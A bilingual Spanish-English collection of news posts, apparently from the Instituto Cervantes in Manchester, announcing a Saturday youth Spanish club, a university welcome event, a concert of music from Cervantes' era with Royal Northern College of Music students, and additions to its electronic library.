Estamos encantados de presentaros un nuevo y ‘selecto’ club que estamos organizando en el Instituto Cervantes de Mánchester: el Club Guay. Dirigido a jóvenes de 10 a 14 años, este club se reunirá los sábados de 12 a 14h y sus miembros mejorarán su español sin olvidar que es fin de semana y que, por tanto, hay que disfrutar.

Precisamente la primera regla del Club Guay es ésa: pasarlo bien.

We are so glad to tell you about the new and ‘select’ club that we are organising at Manchester’s Instituto Cervantes: the Cool Club. Aimed at youngsters from 10 to 14 years old, this club will meet on Saturdays, from 12 to 2pm. Its members will improve their Spanish without forgetting what the weekends are made for: to have fun.

That is, precisely, the first rule of this club: to have fun.

El Instituto Cervantes siempre se complace de recibir a los estudiantes universitarios. Como cada año, nuestro Salón de Actos acogió el 30 de septiembre el acto de bienvenida a más de cien alumnos de la Facultad de Estudios Españoles, Portugueses y Latinoamericanos (SPLAS, por sus siglas en inglés) y del Centro para Estudios Latinoamericanos y Caribeños (CLAC), ambos de la Universidad de Mánchester.

El nuevo director del Instituto Cervantes de Mánchester, Francisco Oda, inauguró el acto seguido de los profesores que impartirán clase durante este curso.

El Instituto Cervantes celebra el entusiasmo de los jóvenes universitarios por el estudio de lo español, portugués, latinoamericano y caribeño. ¡Mucha suerte a todo el alumnado y profesorado!

Instituto Cervantes is always glad to receive university students. Just like every year, our Great Hall held on the 30th September the welcome act to more than one hundred students at the Spanish, Portuguese and Latin American Studies (SPLAS) faculty and the Centre for Latin American and Caribbean Studies (CLAC), both from the University of Manchester.

The current director at Manchester’s Instituto Cervantes, Francisco Oda, gave the welcome speech followed by the teachers that will be teaching during this school year.

Instituto Cervantes celebrates the enthusiasm of the university students for Spanish, Portuguese, Latin American and Caribbean studies. Good luck to all the students and teachers!

Nos alegra contarles que este mes de abril el IC de Mánchester ha preparado un interesante programa cultural en el que destaca el concierto Molinos de Cuerda: La música en tiempos de Cervantes del próximo día 23, en colaboración con el Royal Northern College of Music (RNCM). El propio Miguel de Cervantes además de escritor era músico, capaz de tocar la vihuela y cantar. Esto queda reflejado en el personaje de Don Quijote; si bien existe cierta confusión al respecto, pues en algún capítulo éste pide para tocar no una vihuela sino un laúd, otro instrumento común en el tiempo de la novela.

Tras una investigación, los estudiantes del RNCM de Mánchester han adaptado algunas de las piezas de la época para guitarra. Los estudiantes que participarán en este concierto son: Sam Rodwell, Owen Bunting, Richard Haslam, Bradley Johnson, James Girling, Jamie MacRae e Yvonne Bloor.

A través de este concierto, conmemoramos el 400 aniversario de la publicación de la segunda parte de El ingenioso caballero don Quijote de la Mancha, publicada a finales de 1615.

We are happy to let you know that this very month of April Manchester’s Instituto Cervantes has organised a very interesting programme, where we highlight the concert named Mill Of Strings: Music In Cervantes Times on the 23rd, in collaboration with the Royal Northern College of Music (RNCM).

Miguel de Cervantes himself was known as a musician besides as a writer, as he was able to play vihuela and sing. This is reflected on the character of Don Quixote. There is some kind of confusion about it though, as at some chapter Don Quixote asks for a lute to play instead of a vihuela. The lute was also a common instrument at the time of the novel.

Students at RNCM in Manchester have made a research so as to adapt several pieces of that time to guitar. Students performing in this concert are: Sam Rodwell, Owen Bunting, Richard Haslam, Bradley Johnson, James Girling, Jamie MacRae and Yvonne Bloor.

With this concert, we would like to commemorate the 400th Anniversary of the publication of the second part of the extraordinary work by Miguel de Cervantes Saavedra, The Ingenious Gentleman Don Quixote of La Mancha, published towards the end of 1615.

  Como ya anunciamos la semana pasada, sobre de las novedades en la biblioteca electrónica, esta semana os recomendamos que echéis un vistazo a la sección de los libros más prestados durante el mes pues, ya que entre ellos podréis encontrar Todos los cuentos de Gabriel García Márquez, en el que se recopilan todos los cuentos escritos por este autor desde finales de los años 40 hasta mediados de los años 90. Esta recopilación nos ofrece un total de treinta y siete cuentos a través de los cuales podemos disfrutar de este genial autor colombiano.

  As we announced last week, about the newness in the electronic library,  we recommend you take a look  the books most borrowed during the month, between them you will find Todos los cuentos of the Colombian writer Gabriel García Márquez in which all stories were written from 1940 to 1990 and this collection offers a total of thirty seven stories through which we can enjoy this great writer.

El mes de octubre ha comenzado con novedades en la Biblioteca electrónica. La colección alcanza ya los 4.000 títulos de libros, audiolibros y vídeos. Además, cuenta con numerosas tipologías de novelas, con material de ELE, con libros de lingüísticas o historia, entre otras temáticas. Todos estos ejemplares están al servicio de nuestros usuarios que cuentan con el carné de la biblioteca.

No obstante, las bibliotecas presenciales de la red cuenta entre sus fondos con audiolibros, DVDs, CDs, novelas, material ELE, libros de historia, etc., de origen Hispanoamericano. Por tanto, el Instituto Cervantes ofrece a sus usuarios una amplia oferta de recursos con ambas bibliotecas.

 This month has started with newness in the electronic library. The collection has already 4000 numbers between books, audiobooks and videos. Moreover, it has many types of novels, with ELE material with language or history books, among other topics. All these specimens are serving our users with the library card.

However, the network libraries among its funds audiobooks, DVDs, CDs, novels, ELE materials, history books, etc., whose origin comes from Spanish America.  Therefore,  Instituto Cervantes can offer many resources totheir users  with both libraries.
